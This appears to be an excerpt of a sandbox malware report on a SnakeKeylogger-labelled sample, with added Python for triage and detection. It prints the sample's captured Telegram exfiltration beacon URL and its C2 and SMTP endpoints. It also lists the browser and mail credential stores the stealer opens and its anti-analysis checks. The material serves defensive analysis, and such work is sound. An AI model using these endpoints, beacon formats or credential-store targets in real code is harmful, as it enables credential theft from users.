                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\document pdf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06699548 LdrInitializeThunk,3_2_06699548
                Source: C:\Users\user\Desktop\document pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Users\user\Desktop\document pdf.exe "C:\Users\user\Desktop\document pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Users\user\Desktop\document pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Users\user\Desktop\document pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
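The VM-related strings in the rows above come from two different places, and a triage note should keep them apart: rows attributed to Amcache.hve (a registry hive the analysis VM maintains about its own installed drivers and programs, which is why vmci.sys and the VMware BIOS record appear there) describe the sandbox host, whereas rows attributed to a document pdf.exe memory dump are strings the sample itself held in memory, and rows attributed to the process are API checks the sample issued (the DebugPort query, the MachineGuid read). The Python below is an added example, not code from the Joe Sandbox report: it parses rows in the shape the report's text export produces (source name run straight into the observation label, with a trailing "Jump to behavior" on behaviour rows) as well as the " | "-separated form, then tallies VM strings by origin and lists the API checks. The input rows are copied from the report; the VM marker list and the origin labels are assumptions made for the example.

```python
import re
from collections import Counter

# Rows copied from the report. The text export runs the source name straight into the
# observation label and appends "Jump to behavior" to behaviour rows; the parser also
# accepts the " | "-separated form.
REPORT_ROWS = [
    "Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse",
    "Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys",
    "Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.",
    "Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmp"
    "Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE",
    "Source: document pdf.exe, 00000003.00000002.4662850359.0000000000B66000.00000004.00000020.00020000.00000000.sdmp"
    "Binary or memory string: Hyper-V RAW%SystemRoot%\\system32\\mswsock.dll",
    "Source: C:\\Users\\user\\Desktop\\document pdf.exeProcess queried: DebugPortJump to behavior",
    "Source: C:\\Users\\user\\Desktop\\document pdf.exeKey value queried: "
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuidJump to behavior",
]

# Observation labels used in this part of the report.
LABELS = (
    "Binary or memory string", "Process information queried", "Process queried",
    "Process token adjusted", "Key value queried", "Memory allocated",
    "Queries volume information", "Code function", "File opened", "Key opened",
)
ROW_RE = re.compile(
    r"^Source: (?P<src>.*?)(?: \| )?(?P<label>" + "|".join(re.escape(l) for l in LABELS) + r")"
    r": (?P<value>.*?)(?:Jump to behavior)?$"
)
# Substrings that mark a hypervisor-related string (assumption for this example).
VM_MARKERS = ("vmware", "vmci", "hyper-v", "vbox", "virtualbox", "qemu")


def parse_row(row):
    """Split one report row into (source, observation label, value); None if it is not a row."""
    m = ROW_RE.match(row.strip())
    return (m["src"], m["label"], m["value"]) if m else None


def origin(src):
    """Classify where an observation was taken from."""
    if src.startswith("Amcache.hve"):
        return "analysis-vm-amcache"   # the sandbox VM's own application/driver inventory hive
    if src.endswith(".sdmp"):
        return "sample-memory-dump"
    return "sample-process"


def vm_string_tally(rows):
    """Count VM-related strings per origin so sandbox noise is not read as sample behaviour."""
    tally = Counter()
    for row in rows:
        parsed = parse_row(row)
        if parsed and parsed[1] == "Binary or memory string" \
                and any(marker in parsed[2].lower() for marker in VM_MARKERS):
            tally[origin(parsed[0])] += 1
    return dict(tally)


def api_checks(rows):
    """Anti-analysis checks the sample itself issued (every row that is not a string hit)."""
    checks = []
    for row in rows:
        parsed = parse_row(row)
        if parsed and parsed[1] != "Binary or memory string":
            checks.append((parsed[1], parsed[2]))
    return checks


if __name__ == "__main__":
    print(vm_string_tally(REPORT_ROWS))
    for label, value in api_checks(REPORT_ROWS):
        print(f"{label}: {value}")
```

On the rows above, the three Amcache hits are environment, the two memory-dump hits belong to the sample, and the two API checks are what a detection engineer would actually key on.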

                Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\document pdf.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\document pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR
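The file and registry accesses listed above are the practical detection surface for this family: the Chrome and Edge SQLite stores (Login Data, Cookies, Web Data, History, Top Sites), the Postbox profile directory, and the Outlook profile key under Windows Messaging Subsystem\Profiles. The Python below is an added example and not code from the report or from any EDR product. It runs one rule over constructed file-open and registry-open events in a JSON-lines shape assumed here for the example: any process other than the application that owns a store opening that store is an alert, and ordinary profile files such as Preferences are ignored so that a browser's own housekeeping does not fire it. The event records are constructed; the target paths and the Outlook key are the ones the report lists; the owner-process mapping is an assumption.

```python
import json
from pathlib import PureWindowsPath

# Constructed telemetry (not from the report's own logs): one JSON object per line
# with the accessing process image and the file or registry key it opened.
EVENTS = r"""
{"type":"file_open","image":"C:\\Users\\user\\Desktop\\document pdf.exe","target":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"}
{"type":"file_open","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","target":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"}
{"type":"file_open","image":"C:\\Users\\user\\Desktop\\document pdf.exe","target":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies"}
{"type":"file_open","image":"C:\\Users\\user\\Desktop\\document pdf.exe","target":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences"}
{"type":"file_open","image":"C:\\Users\\user\\Desktop\\document pdf.exe","target":"C:\\Users\\user\\AppData\\Roaming\\PostboxApp\\Profiles\\"}
{"type":"reg_open","image":"C:\\Users\\user\\Desktop\\document pdf.exe","target":"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"}
{"type":"reg_open","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","target":"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"}
{"type":"file_open","image":"C:\\Users\\user\\Desktop\\document pdf.exe","target":"C:\\Windows\\Fonts\\micross.ttf"}
"""

# Browser credential databases worth alerting on (file names inside a profile).
BROWSER_DB_NAMES = {"login data", "cookies", "web data", "history", "top sites"}

# (lower-case path fragment identifying the store, label, owning image, restrict to DB names?)
# The owner mapping is an assumption for this example.
STORES = [
    ("\\google\\chrome\\user data\\", "chrome", "chrome.exe", True),
    ("\\microsoft\\edge\\user data\\", "edge", "msedge.exe", True),
    ("\\appdata\\roaming\\postboxapp\\profiles", "postbox", "postbox.exe", False),
]
OUTLOOK_PROFILE_KEY = "\\windows messaging subsystem\\profiles\\"


def classify(event):
    """Return (store label, owning image) if the event touches a credential store, else None."""
    target = event["target"].lower()
    if event["type"] == "reg_open":
        return ("outlook-profile", "outlook.exe") if OUTLOOK_PROFILE_KEY in target else None
    for fragment, label, owner, db_only in STORES:
        if fragment in target:
            # Only the SQLite databases matter in a browser profile, not every file in it.
            if db_only and PureWindowsPath(target).name not in BROWSER_DB_NAMES:
                return None
            return label, owner
    return None


def detect(events_jsonl):
    """Alert on every credential-store access by a process other than the store's owner."""
    alerts = []
    for line in events_jsonl.strip().splitlines():
        event = json.loads(line)
        hit = classify(event)
        if hit is None:
            continue
        store, owner = hit
        image = PureWindowsPath(event["image"]).name.lower()
        if image != owner:
            alerts.append({"image": image, "store": store, "target": event["target"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(f"{alert['image']} read {alert['store']} store: {alert['target']}")
```

Matching on the image name alone is deliberately simple; in production the owner check should also verify the image path and signature, since an unsigned binary named chrome.exe would pass this rule.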

                Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR
MITRE ATT&CK Matrix. The number in front of a technique is the count of signatures in this report mapped to it; techniques without a number are the matrix's unmatched placeholder cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 21 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Non-Standard Port; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 24 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
document pdf.exe | 74% | Virustotal |
document pdf.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeKeylogger
document pdf.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://us2.smtp.mailhostbox.com | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.199.225 | true | true | | unknown
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
reallyfreegeoip.org | 188.114.96.3 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.8.169 | true | false | | high
18.31.95.13.in-addr.arpa | unknown | unknown | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20and%20Time:%2007/01/2025%20/%2000:14:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20680718%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
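The Telegram URL in the contacted-URL table carries the victim beacon in its percent-encoded text parameter (machine name, date and time, country, and a fixed phrase), with the bot token and chat_id empty as captured, and the string table that follows holds the family's other hard-coded transport endpoints, all on port 8081 (varders.kozow.com, aborters.duckdns.org, anotherarmy.dns.army and 51.38.247.67/_send_.php) beside the IP and country lookups and the SMTP host. The Python below is an added example, not code from the report or from the malware: it decodes the beacon into fields and turns the listed URLs into a defanged endpoint set with a role for each. The URLs are copied from the report; the role mapping follows what the report's signatures say about each host and is an interpretation made for the example, as is defaulting a missing port from the scheme.

```python
from urllib.parse import urlsplit, parse_qs

# URLs copied from the report's contacted-URL and string tables. The bot token and
# chat_id are empty in the captured beacon, exactly as the report shows them.
BEACON = (
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718"
    "%0D%0ADate%20and%20Time:%2007/01/2025%20/%2000:14:20%0D%0ACountry%20Name:%20United%20States"
    "%0D%0A%5B%20680718%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean"
    "%20the%20system%20storage's%20empty.%20%5D"
)
REPORT_URLS = [
    "http://varders.kozow.com:8081",
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "http://51.38.247.67:8081/_send_.php?L",
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "http://checkip.dyndns.org/",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "http://us2.smtp.mailhostbox.com",
]


def parse_beacon(url):
    """Decode a Telegram Bot API sendMessage URL into its labelled beacon fields."""
    parts = urlsplit(url)
    segments = parts.path.split("/")                      # ['', 'bot<token>', 'sendMessage']
    token = segments[1][3:] if len(segments) > 2 and segments[1].startswith("bot") else ""
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    fields = {
        "method": segments[-1],
        "bot_token": token or None,
        "chat_id": query.get("chat_id", [""])[0] or None,
    }
    text = query.get("text", [""])[0]
    for line in text.split("\r\n"):                        # the beacon separates fields with CR LF
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            fields["message"] = line[1:-1].strip()          # fixed phrase at the end of the beacon
        elif ":" in line:
            key, _, value = line.partition(":")             # e.g. "PC Name:680718"
            fields[key.strip()] = value.strip()
    return fields


def endpoints(urls):
    """Distinct (host, port) pairs; a missing port is taken from the scheme (assumption)."""
    found = set()
    for url in urls:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
        found.add((parts.hostname, port))
    return sorted(found)


def defang(host):
    return host.replace(".", "[.]")


def role(host, port):
    """Role per endpoint as the report's signatures describe it (interpretation, not report text)."""
    if host == "api.telegram.org":
        return "telegram-exfil"
    if host in ("checkip.dyndns.org", "reallyfreegeoip.org"):
        return "victim-ip-and-country-lookup"
    if ".smtp." in host:
        return "smtp-exfil"
    if port not in (80, 443):
        return "http-c2-nonstandard-port"
    return "other"


def nonstandard_port_c2(urls):
    """Defanged host:port indicators for everything not on 80 or 443."""
    return [f"{defang(h)}:{p}" for h, p in endpoints(urls) if p not in (80, 443)]


def summarize(urls):
    return {f"{defang(h)}:{p}": role(h, p) for h, p in endpoints(urls)}


if __name__ == "__main__":
    for key, value in parse_beacon(BEACON).items():
        print(f"{key}: {value}")
    for indicator, purpose in summarize(REPORT_URLS).items():
        print(f"{indicator}  {purpose}")
```

Because the token and chat_id are blank in the captured URL, the beacon alone does not identify the operator's bot; the 8081 endpoints are the indicators to block and hunt for.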
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | document pdf.exe, 00000003.00000002.4665157890.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002C29000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://us2.smtp.mailhostbox.com | document pdf.exe, 00000003.00000002.4665157890.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.office.com/lB | document pdf.exe, 00000003.00000002.4665157890.0000000002C33000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.6.dr | false | | high
http://checkip.dyndns.org | document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
